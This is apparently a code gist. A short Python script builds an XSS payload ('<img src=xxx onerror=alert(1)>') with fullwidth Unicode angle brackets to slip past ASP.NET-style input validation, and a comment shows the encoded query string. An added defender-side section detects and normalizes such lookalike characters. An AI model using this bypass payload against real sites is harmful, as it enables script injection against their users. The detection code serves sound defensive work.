@b13bs
Last active September 9, 2019 16:51
```python
#!/usr/bin/env python3
# source: http://gosecure.net/2016/03/22/xss-for-asp-net-developers/
# Name=XSS_HERE_%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E
import urllib.parse

input_string = "<img src=xxx onerror=alert(1)>"
# Swap percent-encoded "<" and ">" for the UTF-8 percent-encoding of
# their fullwidth forms, U+FF1C and U+FF1E.
replacements = {"%3C": "%EF%BC%9C", "%3E": "%EF%BC%9E"}

encoded_string = urllib.parse.quote(input_string)
for key, val in replacements.items():
    encoded_string = encoded_string.replace(key, val)
print(encoded_string)
```
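
A defender-side check for the encoding the script produces, added here as an example and not part of the original gist: Unicode NFKC normalization folds U+FF1C and U+FF1E to ASCII `<` and `>`, so a filter that looks only for ASCII angle brackets should inspect the normalized value as well. The function names and the set of characters treated as HTML-significant are assumptions of this example, and the sample query string is constructed from the comment in the script.

```python
import unicodedata
from urllib.parse import parse_qsl

# ASCII characters a markup filter normally looks for (assumed set).
HTML_SIGNIFICANT = set("<>\"'&")


def compatibility_lookalikes(value):
    """Return (index, code point, ASCII equivalent) for each non-ASCII
    character whose NFKC form is an HTML-significant ASCII character."""
    hits = []
    for i, ch in enumerate(value):
        if ord(ch) < 128:
            continue  # plain ASCII is the regular filter's job
        folded = unicodedata.normalize("NFKC", ch)
        if folded in HTML_SIGNIFICANT:
            hits.append((i, f"U+{ord(ch):04X}", folded))
    return hits


def audit_query(query):
    """Percent-decode each parameter and report lookalike characters,
    together with the value as it reads after NFKC folding."""
    report = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        hits = compatibility_lookalikes(value)
        if hits:
            report[name] = {
                "hits": hits,
                "normalized": unicodedata.normalize("NFKC", value),
            }
    return report


# Constructed sample: the query string from the script's comment,
# followed by a benign parameter.
SAMPLE = ("Name=XSS_HERE_%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)"
          "%EF%BC%9E&lang=fr")

if __name__ == "__main__":
    for name, info in audit_query(SAMPLE).items():
        print(name, info["hits"], info["normalized"])
```

Run the existing validation on the `normalized` value, or reject the request outright when `hits` is non-empty for a field that has no reason to carry fullwidth punctuation.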